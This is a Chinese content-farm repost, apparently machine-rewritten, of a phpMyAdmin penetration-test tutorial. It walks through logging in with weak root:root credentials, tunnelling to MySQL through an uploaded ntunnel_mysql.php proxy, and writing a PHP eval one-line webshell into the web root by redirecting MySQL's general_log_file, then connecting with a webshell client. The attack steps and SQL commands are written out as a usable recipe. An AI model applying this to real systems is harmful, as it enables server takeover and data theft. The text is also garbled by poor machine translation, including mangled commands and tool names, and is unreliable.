最近大家都在讨论2022年01月04日整理发布:分享Phpmyadmin的一次渗透测试相关的事情,对此小编也是非常的感应兴趣,那么这件事具体又是怎么回事呢?下面就是小编搜索到的关于2022年01月04日整理发布:分享Phpmyadmin的一次渗透测试事件的相关信息,我们一起来看看吧!
(资料图片)
我给大家讲一个分享Phpmyadmin的渗透测试。相信朋友们也应该很关心这个话题。现在,让我们来谈谈为我的朋友分享Phpmyadmin的渗透测试。边肖还收集了关于共享Phpmyadmin渗透测试的相关信息。我希望你看到后会喜欢。
下面,phpmyadmin教程栏目将介绍一个Phpmyadmin的渗透测试,希望对有需要的朋友有所帮助!
首先对某站进行了目录扫描,发现phpmyadmin尝试了弱密码root:root幸运的进入
尝试使用Navicate连接到数据库会返回禁止远程连接到数据库:
但是,当远程命令执行发现本地3306端口打开时,它会尝试通过代理进行连接:
将ntunnel_mysql.php文件(数据库的代理脚本)上传到Navicat安装目录中目标服务器的任何网站目录(稍后获取getshell后上传)
上传到D:/phpStudy/WWW目录进行访问。http://XXX/ntunnel_mysql.php测试成功。
进行测试连接:
(此时,打开Navicat在本地配置http连接,这里的通道地址会写你上面访问过的url,也就是说它是一个代理,在钩子上使用base64编码,防止waf从中捣乱,然后把localhost写成主机名,把账号密码写成lnmp01本地数据库用户的账号,因为需要连接lnmp01本地mysql)
Phpmyadmin获取外壳:
使用日志文件
MySQL及以上版本将创建日志文件。修改日志的全局变量也可以是getshell。但是您也应该拥有读写生成的日志的权限。
设置全局general _ log=" ON#当打开general时执行的sql语句将出现在WIN-30DFNC8L78A.log文件中。然后,如果general_log_file的值被修改,执行的sql语句将被相应地生成,然后getshell。
SET global general _ log _ file=" d :/phpStudy/WWW/test 1234 . PHP ";#映射将生成test1234.php文件。
选择?PHP eval($ _ POST[2019]);";#在test1234.php文件中写入一个单词特洛伊
斩波器连接:
以上是分享一个Phpmyadmin渗透测试的细节!
来源:php中文网站
下一篇:最后一页
X 关闭
Copyright © 2015-2022 亚洲空净网版权所有 备案号:豫ICP备20022870号-9 联系邮箱:553 138 779@qq.com